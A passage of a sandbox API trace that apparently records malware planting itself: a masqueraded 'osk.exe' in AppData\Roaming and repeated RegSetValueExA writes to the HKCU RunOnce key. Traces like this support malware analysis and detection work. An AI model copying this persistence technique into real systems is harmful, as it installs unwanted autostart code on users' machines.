riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x11, wReserved2=0x5311, wReserved3=0x74a4, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x11, wReserved2=0x5311, wReserved3=0x74a4, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.502] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.503] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.503] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.503] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0080.503] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.503] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3 [0080.503] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.504] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0080.504] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.504] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.504] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.504] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.504] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.504] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.505] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.505] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.505] RegCloseKey (hKey=0x280) returned 0x0 [0080.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.505] SetTimer (hWnd=0x20280, nIDEvent=0x207e, uElapse=0xa, lpTimerFunc=0x0) returned 0x207e [0080.505] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.517] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.517] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.517] KillTimer (hWnd=0x20280, uIDEvent=0x207e) returned 1 [0080.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.517] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.518] IUnknown:Release (This=0x787518) returned 0x1 [0080.518] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.518] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.518] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.518] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.518] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0080.518] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.518] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4 [0080.519] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.519] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0080.519] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.520] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.520] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.520] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.520] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.520] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.520] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.520] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.520] RegCloseKey (hKey=0x280) returned 0x0 [0080.521] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.521] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.521] SetTimer (hWnd=0x20280, nIDEvent=0x207f, uElapse=0xa, lpTimerFunc=0x0) returned 0x207f [0080.521] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.533] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.533] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.533] KillTimer (hWnd=0x20280, uIDEvent=0x207f) returned 1 [0080.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.533] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.533] IUnknown:Release (This=0x787518) returned 0x1 [0080.533] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.533] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.533] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.534] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.534] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0080.534] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.534] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5 [0080.534] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.535] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0080.535] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.535] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.535] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.535] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.535] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.536] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.536] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.536] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.536] RegCloseKey (hKey=0x280) returned 0x0 [0080.536] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.536] SetTimer (hWnd=0x20280, nIDEvent=0x2080, uElapse=0xa, lpTimerFunc=0x0) returned 0x2080 [0080.536] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.596] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.596] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.596] KillTimer (hWnd=0x20280, uIDEvent=0x2080) returned 1 [0080.596] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.596] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.596] IUnknown:Release (This=0x787518) returned 0x1 [0080.597] FileSystemObject:IDispatch:GetIDsOfNames (in: 